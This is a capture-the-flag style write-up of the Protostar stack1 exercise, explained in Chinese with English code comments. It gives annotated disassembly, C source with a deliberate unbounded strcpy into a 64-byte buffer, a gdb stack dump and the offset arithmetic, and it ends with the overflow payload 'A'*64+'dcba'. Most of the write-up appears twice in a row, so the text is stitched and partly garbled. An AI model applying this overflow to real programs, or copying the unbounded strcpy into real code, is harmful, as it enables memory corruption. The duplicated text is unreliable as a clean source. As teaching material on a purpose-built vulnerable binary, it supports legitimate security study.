[exploit-exercises.com]Protostar Stack1 解答
assembler code:
0x08048464 <main+0>: push ebp                              ; prologue
0x08048465 <main+1>: mov ebp,esp
0x08048467 <main+3>: and esp,0xfffffff0                    ; 16-byte align the stack
0x0804846a <main+6>: sub esp,0x60                          ; 0x60-byte frame: call args at esp, buffer at esp+0x1c, modified at esp+0x5c
0x0804846d <main+9>: cmp DWORD PTR [ebp+0x8],0x1           ; argc == 1 ?
0x08048471 <main+13>: jne 0x8048487 <main+35>              ; an argument was given: skip the errx() call
0x08048473 <main+15>: mov DWORD PTR [esp+0x4],0x80485a0    ; errx() 2nd arg: address of the message string
0x0804847b <main+23>: mov DWORD PTR [esp],0x1              ; errx() 1st arg: exit status 1
0x08048482 <main+30>: call 0x8048388 <errx@plt>            ; errx(1, ...) exits, does not return
0x08048487 <main+35>: mov DWORD PTR [esp+0x5c],0x0         ; modified = 0  (modified lives at esp+0x5c)
0x0804848f <main+43>: mov eax,DWORD PTR [ebp+0xc]          ; eax = argv
0x08048492 <main+46>: add eax,0x4                          ; eax = &argv[1]
0x08048495 <main+49>: mov eax,DWORD PTR [eax]              ; eax = argv[1]
0x08048497 <main+51>: mov DWORD PTR [esp+0x4],eax          ; strcpy() 2nd arg: src = argv[1]
0x0804849b <main+55>: lea eax,[esp+0x1c]                   ; eax = &buffer  (buffer lives at esp+0x1c)
0x0804849f <main+59>: mov DWORD PTR [esp],eax              ; strcpy() 1st arg: dst = buffer
0x080484a2 <main+62>: call 0x8048368 <strcpy@plt>          ; unbounded copy; 0x5c - 0x1c = 0x40 = 64 bytes from buffer to modified
0x080484a7 <main+67>: mov eax,DWORD PTR [esp+0x5c]         ; reload modified from the stack after the copy (volatile)
0x080484ab <main+71>: cmp eax,0x61626364                   ; modified == 0x61626364 ?
0x080484b0 <main+76>: jne 0x80484c0 <main+92>              ; not equal: "Try again" branch
0x080484b2 <main+78>: mov DWORD PTR [esp],0x80485bc        ; success message address
0x080484b9 <main+85>: call 0x8048398 <puts@plt>            ; the printf("...\n") with no format args became puts()
0x080484be <main+90>: jmp 0x80484d5 <main+113>             ; skip to the epilogue
0x080484c0 <main+92>: mov edx,DWORD PTR [esp+0x5c]         ; edx = modified
0x080484c4 <main+96>: mov eax,0x80485f3                    ; "Try again, you got 0x%08x\n" format string address
0x080484c9 <main+101>: mov DWORD PTR [esp+0x4],edx         ; printf() 2nd arg: modified
0x080484cd <main+105>: mov DWORD PTR [esp],eax             ; printf() 1st arg: format
0x080484d0 <main+108>: call 0x8048378 <printf@plt>
0x080484d5 <main+113>: leave                               ; epilogue: esp = ebp; pop ebp
0x080484d6 <main+114>: ret
c code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Protostar stack1.
 *
 * argv[1] is copied into a 64-byte stack buffer with strcpy(), which does not
 * bound the copy. The exercise is to make that overflow set `modified` to
 * 0x61626364 without touching it directly.
 *
 * Returns 0 on success, exits with status 1 (via errx) when no argument is
 * given.
 */
int main(int argc, char **argv)
{
  /* volatile forces the compiler to re-read this from the stack after the
   * strcpy() instead of assuming it is still 0; in the disassembly it lives
   * at [esp+0x5c]. */
  volatile int modified;
  /* At [esp+0x1c] in the disassembly: exactly 0x40 = 64 bytes below modified. */
  char buffer[64];

  if(argc == 1) {
    /* errx() is declared in <err.h>, which this source does not include; the
     * call relies on an implicit declaration. Terminates the process. */
    errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* Unbounded copy of untrusted argv[1] into a 64-byte buffer: this is the
   * bug the exercise is built around. Any argument longer than 64 bytes keeps
   * writing past buffer into modified and beyond. A bounded copy such as
   * snprintf(buffer, sizeof buffer, "%s", argv[1]) would close the hole. */
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
    printf("you have correctly got the variable to the right value\n");
  } else {
    /* %08x with an int argument: prints whatever the overflow left in modified. */
    printf("Try again, you got 0x%08x\n", modified);
  }
}
只要讓 modified == 0x61626364 就算通過。我們知道 strcpy 不會檢查目的 buffer 的大小，即使輸入已經超過 buffer 的 64 bytes，還是會繼續覆蓋 buffer 之後的記憶體。
注意 <main+67> & <main+71>，可以發現要覆蓋的地方是 esp+0x5c（<main+35> 在 strcpy 之前把這個位置設為 0，也就是 modified 所在的位置）。
看一下esp
(gdb) break *0x080484a7
(gdb) x/24wx $esp
0xbffff750: 0xbffff76c 0xbffff997 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0xbfff0041 0x08048334
0xbffff780: 0xb7ff1040 0x080496fc 0xbffff7b8 0x08048509
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
(gdb) info register
eax            0xbffff76c	-1073744020
ecx            0x0	0
edx            0xe	14
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff750	0xbffff750
ebp            0xbffff7b8	0xbffff7b8
所以要覆蓋的地址是esp+0x5c = 0xbffff7ac
0xbffff7ac-0xbffff76c=0x40=64，所以先用 64 個字元填滿 buffer，接著寫入 0x61626364。因為 x86 是 little-endian，這個值在記憶體中的位元組順序是 64 63 62 61，轉成 ASCII 就是 'dcba'。
0x08048464 <main+0>: push ebp                              ; prologue
0x08048465 <main+1>: mov ebp,esp
0x08048467 <main+3>: and esp,0xfffffff0                    ; 16-byte align the stack
0x0804846a <main+6>: sub esp,0x60                          ; 0x60-byte frame: call args at esp, buffer at esp+0x1c, modified at esp+0x5c
0x0804846d <main+9>: cmp DWORD PTR [ebp+0x8],0x1           ; argc == 1 ?
0x08048471 <main+13>: jne 0x8048487 <main+35>              ; an argument was given: skip the errx() call
0x08048473 <main+15>: mov DWORD PTR [esp+0x4],0x80485a0    ; errx() 2nd arg: address of the message string
0x0804847b <main+23>: mov DWORD PTR [esp],0x1              ; errx() 1st arg: exit status 1
0x08048482 <main+30>: call 0x8048388 <errx@plt>            ; errx(1, ...) exits, does not return
0x08048487 <main+35>: mov DWORD PTR [esp+0x5c],0x0         ; modified = 0  (modified lives at esp+0x5c)
0x0804848f <main+43>: mov eax,DWORD PTR [ebp+0xc]          ; eax = argv
0x08048492 <main+46>: add eax,0x4                          ; eax = &argv[1]
0x08048495 <main+49>: mov eax,DWORD PTR [eax]              ; eax = argv[1]
0x08048497 <main+51>: mov DWORD PTR [esp+0x4],eax          ; strcpy() 2nd arg: src = argv[1]
0x0804849b <main+55>: lea eax,[esp+0x1c]                   ; eax = &buffer  (buffer lives at esp+0x1c)
0x0804849f <main+59>: mov DWORD PTR [esp],eax              ; strcpy() 1st arg: dst = buffer
0x080484a2 <main+62>: call 0x8048368 <strcpy@plt>          ; unbounded copy; 0x5c - 0x1c = 0x40 = 64 bytes from buffer to modified
0x080484a7 <main+67>: mov eax,DWORD PTR [esp+0x5c]         ; reload modified from the stack after the copy (volatile)
0x080484ab <main+71>: cmp eax,0x61626364                   ; modified == 0x61626364 ?
0x080484b0 <main+76>: jne 0x80484c0 <main+92>              ; not equal: "Try again" branch
0x080484b2 <main+78>: mov DWORD PTR [esp],0x80485bc        ; success message address
0x080484b9 <main+85>: call 0x8048398 <puts@plt>            ; the printf("...\n") with no format args became puts()
0x080484be <main+90>: jmp 0x80484d5 <main+113>             ; skip to the epilogue
0x080484c0 <main+92>: mov edx,DWORD PTR [esp+0x5c]         ; edx = modified
0x080484c4 <main+96>: mov eax,0x80485f3                    ; "Try again, you got 0x%08x\n" format string address
0x080484c9 <main+101>: mov DWORD PTR [esp+0x4],edx         ; printf() 2nd arg: modified
0x080484cd <main+105>: mov DWORD PTR [esp],eax             ; printf() 1st arg: format
0x080484d0 <main+108>: call 0x8048378 <printf@plt>
0x080484d5 <main+113>: leave                               ; epilogue: esp = ebp; pop ebp
0x080484d6 <main+114>: ret
c code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Protostar stack1.
 *
 * argv[1] is copied into a 64-byte stack buffer with strcpy(), which does not
 * bound the copy. The exercise is to make that overflow set `modified` to
 * 0x61626364 without touching it directly.
 *
 * Returns 0 on success, exits with status 1 (via errx) when no argument is
 * given.
 */
int main(int argc, char **argv)
{
  /* volatile forces the compiler to re-read this from the stack after the
   * strcpy() instead of assuming it is still 0; in the disassembly it lives
   * at [esp+0x5c]. */
  volatile int modified;
  /* At [esp+0x1c] in the disassembly: exactly 0x40 = 64 bytes below modified. */
  char buffer[64];

  if(argc == 1) {
    /* errx() is declared in <err.h>, which this source does not include; the
     * call relies on an implicit declaration. Terminates the process. */
    errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* Unbounded copy of untrusted argv[1] into a 64-byte buffer: this is the
   * bug the exercise is built around. Any argument longer than 64 bytes keeps
   * writing past buffer into modified and beyond. A bounded copy such as
   * snprintf(buffer, sizeof buffer, "%s", argv[1]) would close the hole. */
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
    printf("you have correctly got the variable to the right value\n");
  } else {
    /* %08x with an int argument: prints whatever the overflow left in modified. */
    printf("Try again, you got 0x%08x\n", modified);
  }
}
只要讓 modified == 0x61626364 就算通過。我們知道 strcpy 不會檢查目的 buffer 的大小，即使輸入已經超過 buffer 的 64 bytes，還是會繼續覆蓋 buffer 之後的記憶體。
注意 <main+67> & <main+71>，可以發現要覆蓋的地方是 esp+0x5c（<main+35> 在 strcpy 之前把這個位置設為 0，也就是 modified 所在的位置）。
看一下esp
(gdb) break *0x080484a7
(gdb) x/24wx $esp
0xbffff750: 0xbffff76c 0xbffff997 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0xbfff0041 0x08048334
0xbffff780: 0xb7ff1040 0x080496fc 0xbffff7b8 0x08048509
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
(gdb) info register
eax            0xbffff76c	-1073744020
ecx            0x0	0
edx            0xe	14
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff750	0xbffff750
ebp            0xbffff7b8	0xbffff7b8
所以要覆蓋的地址是esp+0x5c = 0xbffff7ac
0xbffff7ac-0xbffff76c=0x40=64，所以先用 64 個字元填滿 buffer，接著寫入 0x61626364。因為 x86 是 little-endian，這個值在記憶體中的位元組順序是 64 63 62 61，轉成 ASCII 就是 'dcba'。
payload = 'A'*64+'dcba'